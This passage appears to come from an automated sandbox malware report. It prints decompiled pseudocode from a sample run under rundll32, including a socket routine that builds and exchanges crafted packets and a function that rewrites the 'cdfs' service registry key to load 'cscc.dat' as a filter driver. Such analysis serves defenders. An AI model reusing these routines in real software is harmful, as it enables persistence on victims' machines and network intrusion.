                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFreehtonsrand$memcpysend$recv
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063504749-0
                                                                                                                                                  • Opcode ID: e8e86ecb7c8fe67d792e50edade86990ab24eec6c8f753ad2c614e8669b8b637
                                                                                                                                                  • Instruction ID: 828633b4f23652879938f8bfabeaf34fe96edb1ab10a047fb3bc8753147b323d
                                                                                                                                                  • Opcode Fuzzy Hash: e8e86ecb7c8fe67d792e50edade86990ab24eec6c8f753ad2c614e8669b8b637
                                                                                                                                                  • Instruction Fuzzy Hash: A4E1CF75600305EFEB20DFA4C949BAA7BB5FF48710F508099FA05AB391E7B5E840CB54
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                  			E04773D0D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8, short _a12, intOrPtr _a16, void* _a20, void** _a24, long _a28, void* _a32) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _t139;
                                                                                                                                                  				short _t158;
                                                                                                                                                  				void* _t169;
                                                                                                                                                  				signed int _t173;
                                                                                                                                                  				int _t176;
                                                                                                                                                  				void* _t184;
                                                                                                                                                  				signed short _t186;
                                                                                                                                                  				intOrPtr _t207;
                                                                                                                                                  				void* _t212;
                                                                                                                                                  				short _t219;
                                                                                                                                                  				void* _t223;
                                                                                                                                                  				intOrPtr* _t225;
                                                                                                                                                  				short _t227;
                                                                                                                                                  				short _t228;
                                                                                                                                                  				signed int _t229;
                                                                                                                                                  				intOrPtr* _t234;
                                                                                                                                                  				intOrPtr _t243;
                                                                                                                                                  				void* _t255;
                                                                                                                                                  				void* _t261;
                                                                                                                                                  
                                                                                                                                                  				_t243 = __edx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				 *_a24 =  *_a24 & 0x00000000;
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t139 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v12 = _t139;
                                                                                                                                                  				if(_t139 == 0) {
                                                                                                                                                  					L24:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t261 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                  				if(_t261 == 0) {
                                                                                                                                                  					L23:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                  					goto L24;
                                                                                                                                                  				}
                                                                                                                                                  				 *_t261 = 0x12;
                                                                                                                                                  				 *((intOrPtr*)(_t261 + 0x1c)) = 0x48;
                                                                                                                                                  				_t223 = HeapAlloc(GetProcessHeap(), 8, 0x3d);
                                                                                                                                                  				if(_t223 == 0) {
                                                                                                                                                  					L22:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t261);
                                                                                                                                                  					goto L23;
                                                                                                                                                  				}
                                                                                                                                                  				_t225 =  *_a32;
                                                                                                                                                  				if(1 !=  *_t225) {
                                                                                                                                                  					 *(_t261 + 8) = 0x3c;
                                                                                                                                                  					asm("cdq");
                                                                                                                                                  					asm("adc edx, [ecx+0x4c]");
                                                                                                                                                  					 *((intOrPtr*)(_t223 + 1)) = ( *(_t225 + 0x51) & 0x000000ff) +  *((intOrPtr*)(_t225 + 0x48));
                                                                                                                                                  					 *((intOrPtr*)(_t223 + 5)) = _t243;
                                                                                                                                                  					 *((intOrPtr*)(_t223 + 9)) =  *((intOrPtr*)(_t225 + 0x48)) + 0x200;
                                                                                                                                                  					 *((intOrPtr*)(_t223 + 0x11)) = _a16;
                                                                                                                                                  					 *((intOrPtr*)(_t223 + 0x15)) = _a20;
                                                                                                                                                  					_t158 = _a28;
                                                                                                                                                  					asm("adc edx, 0x0");
                                                                                                                                                  					 *((intOrPtr*)(_t223 + 0xd)) =  *((intOrPtr*)(_t225 + 0x4c));
                                                                                                                                                  					 *((char*)(_t223 + 0x21)) = 8;
                                                                                                                                                  					 *((char*)(_t223 + 0x25)) = 8;
                                                                                                                                                  					 *((char*)(_t223 + 0x29)) = 8;
                                                                                                                                                  					 *((short*)(_t223 + 0x2d)) = _t158;
                                                                                                                                                  					 *((short*)(_t223 + 0x31)) = _t158;
                                                                                                                                                  					 *((short*)(_t223 + 0x35)) = _t158;
                                                                                                                                                  					 *((char*)(_t223 + 0x3b)) = 5;
                                                                                                                                                  				} else {
                                                                                                                                                  					 *(_t261 + 8) = 0x30;
                                                                                                                                                  					asm("cdq");
                                                                                                                                                  					asm("adc edx, [ecx+0x4c]");
                                                                                                                                                  					 *((intOrPtr*)(_t223 + 1)) = ( *(_t225 + 0x51) & 0x000000ff) +  *((intOrPtr*)(_t225 + 0x48));
                                                                                                                                                  					 *((intOrPtr*)(_t223 + 5)) = _t243;
                                                                                                                                                  					 *((intOrPtr*)(_t223 + 5)) =  *((intOrPtr*)(_t225 + 0x48)) + 0x200;
                                                                                                                                                  					 *((intOrPtr*)(_t223 + 9)) = _a16;
                                                                                                                                                  					_t219 = _a28;
                                                                                                                                                  					 *((char*)(_t223 + 0x15)) = 8;
                                                                                                                                                  					 *((char*)(_t223 + 0x19)) = 8;
                                                                                                                                                  					 *((char*)(_t223 + 0x1d)) = 8;
                                                                                                                                                  					 *((short*)(_t223 + 0x21)) = _t219;
                                                                                                                                                  					 *((short*)(_t223 + 0x25)) = _t219;
                                                                                                                                                  					 *((short*)(_t223 + 0x29)) = _t219;
                                                                                                                                                  					 *((char*)(_t223 + 0x2f)) = 5;
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t261 + 0x18) =  *(_t261 + 8);
                                                                                                                                                  				 *(_t261 + 0x20) =  *(_t225 + 0x53) & 0x000000ff;
                                                                                                                                                  				 *(_t261 + 0x25) = ( *(_t261 + 0x18) & 0x0000ffff) + 1;
                                                                                                                                                  				if(E04773209(_t225, _a4,  *_a8,  *(_t225 + 0x30) & 0x0000ffff, _t261, _t223, ( *(_t261 + 0x18) & 0x0000ffff) + 1) == 0) {
                                                                                                                                                  					L21:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t223);
                                                                                                                                                  					goto L22;
                                                                                                                                                  				} else {
                                                                                                                                                  					Sleep(0x7d0);
                                                                                                                                                  					_t169 = HeapAlloc(GetProcessHeap(), 8, 0x29);
                                                                                                                                                  					_a20 = _t169;
                                                                                                                                                  					if(_t169 == 0) {
                                                                                                                                                  						goto L21;
                                                                                                                                                  					}
                                                                                                                                                  					 *((intOrPtr*)(_t169 + 8)) = 0x42e0;
                                                                                                                                                  					 *((intOrPtr*)(_t169 + 0x10)) = 0x42e0;
                                                                                                                                                  					 *_t169 = 0x13;
                                                                                                                                                  					 *(_t169 + 0x14) = 4;
                                                                                                                                                  					 *((intOrPtr*)(_t169 + 0x18)) = 0x4c;
                                                                                                                                                  					_t227 = 5;
                                                                                                                                                  					 *((short*)(_t169 + 0x25)) = _t227;
                                                                                                                                                  					 *((intOrPtr*)(_t169 + 4)) = 0x1000;
                                                                                                                                                  					 *((intOrPtr*)(_t169 + 0xc)) = 0x1000;
                                                                                                                                                  					_t228 = 7;
                                                                                                                                                  					 *((short*)(_t169 + 0x27)) = _t228;
                                                                                                                                                  					asm("stosd");
                                                                                                                                                  					asm("stosw");
                                                                                                                                                  					asm("stosb");
                                                                                                                                                  					 *((short*)(_t223 + 3)) = _a12;
                                                                                                                                                  					_t173 = rand();
                                                                                                                                                  					_t229 = 0x28;
                                                                                                                                                  					asm("cdq");
                                                                                                                                                  					 *( *_a8 + 0x22) =  *( *_a8 + 0x22) + _t173 % _t229;
                                                                                                                                                  					_t253 = _a8;
                                                                                                                                                  					_t231 =  *( *_a8 + 0x22) & 0x0000ffff;
                                                                                                                                                  					_t176 = E047732AF(_a4,  *_a8,  *( *_a8 + 0x22) & 0x0000ffff, _a20, _t223,  *(_a20 + 0x27) & 0x0000ffff);
                                                                                                                                                  					if(_t176 == 0) {
                                                                                                                                                  						memset(_t261, _t176, 0x27);
                                                                                                                                                  						 *_t261 = 0x12;
                                                                                                                                                  						_t184 = E04773209(_t231, _a4,  *_t253,  *( *_a32 + 0x32) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff);
                                                                                                                                                  						if(_t184 != 0) {
                                                                                                                                                  							_t255 = _v12;
                                                                                                                                                  							__imp__#16(_a4, _t255, 0xffff, 0);
                                                                                                                                                  							if(_t184 > 0 &&  *((intOrPtr*)(_t255 + 9)) == 0) {
                                                                                                                                                  								_a28 = _a28 & 0x0000ffff;
                                                                                                                                                  								_t186 =  *(_t255 + 2) & 0x0000ffff;
                                                                                                                                                  								__imp__#9(_t186);
                                                                                                                                                  								if(_a28 + 8 <= (_t186 & 0x0000ffff)) {
                                                                                                                                                  									_t234 =  *_a32;
                                                                                                                                                  									asm("cdq");
                                                                                                                                                  									asm("sbb eax, edx");
                                                                                                                                                  									 *((intOrPtr*)(_t234 + 0x48)) =  *((intOrPtr*)(_t255 + 0x4c)) - ( *(_t234 + 0x51) & 0x000000ff);
                                                                                                                                                  									 *((intOrPtr*)(_t234 + 0x4c)) =  *((intOrPtr*)(_v12 + 0x50));
                                                                                                                                                  									if(1 !=  *_t234) {
                                                                                                                                                  										 *(_t261 + 4) = 8;
                                                                                                                                                  									} else {
                                                                                                                                                  										 *(_t261 + 4) = 4;
                                                                                                                                                  									}
                                                                                                                                                  									 *(_t261 + 0xc) =  *(_t261 + 4);
                                                                                                                                                  									 *((intOrPtr*)(_t261 + 0x10)) = 0x48;
                                                                                                                                                  									 *(_t261 + 0x14) =  *(_t234 + 0x54) & 0x000000ff;
                                                                                                                                                  									 *(_t261 + 0x25) =  *(_t261 + 4) + 1;
                                                                                                                                                  									 *((intOrPtr*)(_t223 + 1)) =  *((intOrPtr*)(_t234 + 0x48));
                                                                                                                                                  									 *((intOrPtr*)(_t223 + 5)) =  *((intOrPtr*)(_t234 + 0x4c));
                                                                                                                                                  									if(E04773209(_t234, _a4,  *_a8,  *(_t234 + 0x30) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff) != 0) {
                                                                                                                                                  										Sleep(0x7d0);
                                                                                                                                                  										_push(2);
                                                                                                                                                  										asm("stosw");
                                                                                                                                                  										asm("stosb");
                                                                                                                                                  										 *(_t261 + 8) = 0;
                                                                                                                                                  										 *(_t261 + 0x18) = 0;
                                                                                                                                                  										_t207 =  *_a32;
                                                                                                                                                  										 *(_t261 + 4) = 0;
                                                                                                                                                  										 *(_t261 + 0xc) = 0;
                                                                                                                                                  										 *((intOrPtr*)(_t261 + 0x10)) = 0;
                                                                                                                                                  										 *(_t261 + 0x14) = 0;
                                                                                                                                                  										 *((intOrPtr*)(_t261 + 0x1c)) = 0x48;
                                                                                                                                                  										 *(_t261 + 0x20) =  *(_t207 + 0x59) & 0x000000ff;
                                                                                                                                                  										 *(_t261 + 0x25) =  *(_t261 + 8) + 1;
                                                                                                                                                  										 *((short*)(_t223 + 1)) =  *((intOrPtr*)(_t207 + 0x32));
                                                                                                                                                  										if(E04773209( *(_t261 + 0x25) & 0x0000ffff, _a4,  *_a8,  *(_t207 + 0x30) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff) != 0) {
                                                                                                                                                  											Sleep(0x7d0);
                                                                                                                                                  											_t212 = HeapAlloc(GetProcessHeap(), 8, _a28);
                                                                                                                                                  											 *_a24 = _t212;
                                                                                                                                                  											if(_t212 != 0) {
                                                                                                                                                  												memcpy(_t212, _v12 + 0x54, _a28);
                                                                                                                                                  												_v5 = 1;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _a20);
                                                                                                                                                  					goto L21;
                                                                                                                                                  				}
                                                                                                                                                  			}
























                                                                                                                                                  0x04773d0d
                                                                                                                                                  0x04773d10
                                                                                                                                                  0x04773d11
                                                                                                                                                  0x04773d15
                                                                                                                                                  0x04773d27
                                                                                                                                                  0x04773d34
                                                                                                                                                  0x04773d36
                                                                                                                                                  0x04773d3b
                                                                                                                                                  0x047740da
                                                                                                                                                  0x047740e0
                                                                                                                                                  0x047740e0
                                                                                                                                                  0x04773d4b
                                                                                                                                                  0x04773d4f
                                                                                                                                                  0x047740cb
                                                                                                                                                  0x047740d3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047740d9
                                                                                                                                                  0x04773d59
                                                                                                                                                  0x04773d5c
                                                                                                                                                  0x04773d68
                                                                                                                                                  0x04773d6c
                                                                                                                                                  0x047740bf
                                                                                                                                                  0x047740c5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047740c5
                                                                                                                                                  0x04773d75
                                                                                                                                                  0x04773d7d
                                                                                                                                                  0x04773dca
                                                                                                                                                  0x04773dd5
                                                                                                                                                  0x04773dd9
                                                                                                                                                  0x04773ddc
                                                                                                                                                  0x04773ddf
                                                                                                                                                  0x04773ded
                                                                                                                                                  0x04773df3
                                                                                                                                                  0x04773df9
                                                                                                                                                  0x04773dfc
                                                                                                                                                  0x04773e00
                                                                                                                                                  0x04773e03
                                                                                                                                                  0x04773e06
                                                                                                                                                  0x04773e0a
                                                                                                                                                  0x04773e0e
                                                                                                                                                  0x04773e12
                                                                                                                                                  0x04773e16
                                                                                                                                                  0x04773e1a
                                                                                                                                                  0x04773e1e
                                                                                                                                                  0x04773d7f
                                                                                                                                                  0x04773d7f
                                                                                                                                                  0x04773d8a
                                                                                                                                                  0x04773d8e
                                                                                                                                                  0x04773d91
                                                                                                                                                  0x04773d94
                                                                                                                                                  0x04773d9f
                                                                                                                                                  0x04773da5
                                                                                                                                                  0x04773da8
                                                                                                                                                  0x04773dac
                                                                                                                                                  0x04773db0
                                                                                                                                                  0x04773db4
                                                                                                                                                  0x04773db8
                                                                                                                                                  0x04773dbc
                                                                                                                                                  0x04773dc0
                                                                                                                                                  0x04773dc4
                                                                                                                                                  0x04773dc4
                                                                                                                                                  0x04773e25
                                                                                                                                                  0x04773e2c
                                                                                                                                                  0x04773e35
                                                                                                                                                  0x04773e50
                                                                                                                                                  0x047740b3
                                                                                                                                                  0x047740b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04773e56
                                                                                                                                                  0x04773e5b
                                                                                                                                                  0x04773e68
                                                                                                                                                  0x04773e6e
                                                                                                                                                  0x04773e73
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04773e7e
                                                                                                                                                  0x04773e81
                                                                                                                                                  0x04773e86
                                                                                                                                                  0x04773e89
                                                                                                                                                  0x04773e90
                                                                                                                                                  0x04773e97
                                                                                                                                                  0x04773e98
                                                                                                                                                  0x04773ea1
                                                                                                                                                  0x04773ea4
                                                                                                                                                  0x04773ea9
                                                                                                                                                  0x04773eaa
                                                                                                                                                  0x04773eb2
                                                                                                                                                  0x04773eb3
                                                                                                                                                  0x04773eb5
                                                                                                                                                  0x04773eba
                                                                                                                                                  0x04773ec3
                                                                                                                                                  0x04773ecb
                                                                                                                                                  0x04773ecc
                                                                                                                                                  0x04773ed2
                                                                                                                                                  0x04773eda
                                                                                                                                                  0x04773ee2
                                                                                                                                                  0x04773eeb
                                                                                                                                                  0x04773ef2
                                                                                                                                                  0x04773efc
                                                                                                                                                  0x04773f0f
                                                                                                                                                  0x04773f1d
                                                                                                                                                  0x04773f24
                                                                                                                                                  0x04773f2a
                                                                                                                                                  0x04773f38
                                                                                                                                                  0x04773f40
                                                                                                                                                  0x04773f54
                                                                                                                                                  0x04773f57
                                                                                                                                                  0x04773f5c
                                                                                                                                                  0x04773f6d
                                                                                                                                                  0x04773f76
                                                                                                                                                  0x04773f7f
                                                                                                                                                  0x04773f88
                                                                                                                                                  0x04773f8a
                                                                                                                                                  0x04773f8d
                                                                                                                                                  0x04773f96
                                                                                                                                                  0x04773fa1
                                                                                                                                                  0x04773f98
                                                                                                                                                  0x04773f98
                                                                                                                                                  0x04773f98
                                                                                                                                                  0x04773fab
                                                                                                                                                  0x04773fae
                                                                                                                                                  0x04773fb9
                                                                                                                                                  0x04773fc2
                                                                                                                                                  0x04773fc9
                                                                                                                                                  0x04773fcf
                                                                                                                                                  0x04773fed
                                                                                                                                                  0x04773ff8
                                                                                                                                                  0x04774000
                                                                                                                                                  0x04774004
                                                                                                                                                  0x04774006
                                                                                                                                                  0x04774008
                                                                                                                                                  0x0477400b
                                                                                                                                                  0x04774011
                                                                                                                                                  0x04774015
                                                                                                                                                  0x04774018
                                                                                                                                                  0x0477401b
                                                                                                                                                  0x0477401e
                                                                                                                                                  0x04774021
                                                                                                                                                  0x0477402c
                                                                                                                                                  0x04774035
                                                                                                                                                  0x0477403d
                                                                                                                                                  0x0477405c
                                                                                                                                                  0x04774063
                                                                                                                                                  0x04774075
                                                                                                                                                  0x0477407e
                                                                                                                                                  0x04774082
                                                                                                                                                  0x0477408f
                                                                                                                                                  0x04774097
                                                                                                                                                  0x04774097
                                                                                                                                                  0x04774082
                                                                                                                                                  0x0477405c
                                                                                                                                                  0x04773fed
                                                                                                                                                  0x04773f6d
                                                                                                                                                  0x04773f40
                                                                                                                                                  0x04773f24
                                                                                                                                                  0x047740a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047740ad

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74CB4F20,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?), ref: 04773D2B
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04773D34
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04773D46
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04773D49
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04773D63
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04773D66
                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04774269,?,00000000,?,?,?), ref: 04773E5B
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04773E65
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04773E68
                                                                                                                                                  • rand.MSVCRT ref: 04773EC3
                                                                                                                                                  • memset.MSVCRT ref: 04773EFC
                                                                                                                                                    • Part of subcall function 04773209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04773BAA,?,?,?,00000000,00000000,?,?,?,04774A6E), ref: 04773220
                                                                                                                                                    • Part of subcall function 04773209: HeapAlloc.KERNEL32(00000000,?,04773BAA,?,?,?,00000000,00000000,?,?,?,04774A6E,?,?,?,?), ref: 04773227
                                                                                                                                                    • Part of subcall function 04773209: htons.WS2_32(?), ref: 04773246
                                                                                                                                                    • Part of subcall function 04773209: memcpy.MSVCRT ref: 04773276
                                                                                                                                                    • Part of subcall function 04773209: send.WS2_32(?,00000000,?,00000000), ref: 04773287
                                                                                                                                                    • Part of subcall function 04773209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0477329A
                                                                                                                                                    • Part of subcall function 04773209: HeapFree.KERNEL32(00000000), ref: 047732A1
                                                                                                                                                  • recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04773F38
                                                                                                                                                  • htons.WS2_32(?), ref: 04773F5C
                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04773FF8
                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04774063
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 0477406E
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04774075
                                                                                                                                                  • memcpy.MSVCRT ref: 0477408F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,04774269,?,00000000,?,?), ref: 047740A0
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 047740A7
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04774269,?,00000000,?,?), ref: 047740B6
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 047740B9
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 047740C2
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 047740C5
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 047740D0
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 047740D3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Alloc$Free$Sleep$htonsmemcpy$memsetrandrecvsend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2208892845-0
                                                                                                                                                  • Opcode ID: d445e71405e47bd59521a33df85420463dfcf2be794840cf730d13865f93e8b8
                                                                                                                                                  • Instruction ID: b10c468188c76acd49fbead70567e23e7194def4769275c9bb504a6b194da5fb
                                                                                                                                                  • Opcode Fuzzy Hash: d445e71405e47bd59521a33df85420463dfcf2be794840cf730d13865f93e8b8
                                                                                                                                                  • Instruction Fuzzy Hash: 53D16CB0100300AFDB20DF69C884B6ABBE5FF49304F558599F989DB392E779E845CB64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E047713E8() {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				int _v24;
                                                                                                                                                  				short _v544;
                                                                                                                                                  				long _t45;
                                                                                                                                                  				signed int _t47;
                                                                                                                                                  				short* _t49;
                                                                                                                                                  				int _t54;
                                                                                                                                                  
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				wsprintfW( &_v544, L"SYSTEM\\CurrentControlSet\\services\\%ws", L"cdfs");
                                                                                                                                                  				if(RegOpenKeyExW(0x80000002,  &_v544, 0, 0xf003f,  &_v8) == 0) {
                                                                                                                                                  					_t54 = 4;
                                                                                                                                                  					_t49 = L"Start";
                                                                                                                                                  					_v12 = 0;
                                                                                                                                                  					_v24 = _t54;
                                                                                                                                                  					if(RegQueryValueExW(_v8, _t49, 0, 0,  &_v12,  &_v24) == 0 && _v12 == _t54) {
                                                                                                                                                  						_v12 = 0;
                                                                                                                                                  						if(RegSetValueExW(_v8, _t49, 0, _t54,  &_v12, _t54) == 0 && RegSetValueExW(_v8, _t49, 0, 4,  &_v12, 4) == 0 && RegSetValueExW(_v8, L"Group", 0, 1, L"Filter", 0xe) == 0 && RegSetValueExW(_v8, L"DependOnService", 0, 7, L"FltMgr", 0xe) == 0) {
                                                                                                                                                  							_v20 = 3;
                                                                                                                                                  							if(RegSetValueExW(_v8, L"ErrorControl", 0, 4,  &_v20, 4) == 0) {
                                                                                                                                                  								_t45 = RegSetValueExW(_v8, L"ImagePath", 0, 2, L"cscc.dat", 0x12);
                                                                                                                                                  								if(_t45 == 0) {
                                                                                                                                                  									do {
                                                                                                                                                  										_t47 =  *(L"cdfs" + _t45) & 0x0000ffff;
                                                                                                                                                  										 *(L"cscc" + _t45) = _t47;
                                                                                                                                                  										_t45 = _t45 + 2;
                                                                                                                                                  									} while (_t47 != 0);
                                                                                                                                                  									_v16 = 1;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					RegCloseKey(_v8);
                                                                                                                                                  				}
                                                                                                                                                  				return _v16;
                                                                                                                                                  			}













                                                                                                                                                  0x04771405
                                                                                                                                                  0x04771408
                                                                                                                                                  0x0477142f
                                                                                                                                                  0x04771439
                                                                                                                                                  0x04771444
                                                                                                                                                  0x0477144d
                                                                                                                                                  0x04771450
                                                                                                                                                  0x0477145b
                                                                                                                                                  0x0477147b
                                                                                                                                                  0x04771482
                                                                                                                                                  0x047714e2
                                                                                                                                                  0x047714ed
                                                                                                                                                  0x04771501
                                                                                                                                                  0x04771505
                                                                                                                                                  0x04771507
                                                                                                                                                  0x04771507
                                                                                                                                                  0x0477150e
                                                                                                                                                  0x04771515
                                                                                                                                                  0x04771518
                                                                                                                                                  0x0477151d
                                                                                                                                                  0x0477151d
                                                                                                                                                  0x04771505
                                                                                                                                                  0x047714ed
                                                                                                                                                  0x04771482
                                                                                                                                                  0x04771523
                                                                                                                                                  0x0477152a
                                                                                                                                                  0x04771530

                                                                                                                                                  APIs
                                                                                                                                                  • wsprintfW.USER32 ref: 04771408
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 04771427
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 04771453
                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 0477147E
                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04771495
                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 047714B3
                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 047714CB
                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 047714E9
                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,ImagePath,00000000,00000002,cscc.dat,00000012,?,00000000), ref: 04771501
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 04771523
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value$CloseOpenQuerywsprintf
                                                                                                                                                  • String ID: DependOnService$ErrorControl$Filter$FltMgr$Group$ImagePath$SYSTEM\CurrentControlSet\services\%ws$Start$cdfs$cscc$cscc.dat
                                                                                                                                                  • API String ID: 693892761-175094307
                                                                                                                                                  • Opcode ID: 4eba1dde22ae50e12f32adfec0eedbbc5a19f3b22d148d1866f4fa6de16e805f
                                                                                                                                                  • Instruction ID: 7b41ff15caa34c06782e430b9cc95de9451be9414251efa30d0e9d7b64f7257d
                                                                                                                                                  • Opcode Fuzzy Hash: 4eba1dde22ae50e12f32adfec0eedbbc5a19f3b22d148d1866f4fa6de16e805f
                                                                                                                                                  • Instruction Fuzzy Hash: 0A314FB1A8125DBAEF209E919D45FEF7B7CEF44B44F904099BA01F1240E2B0AF05DB61
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 83%
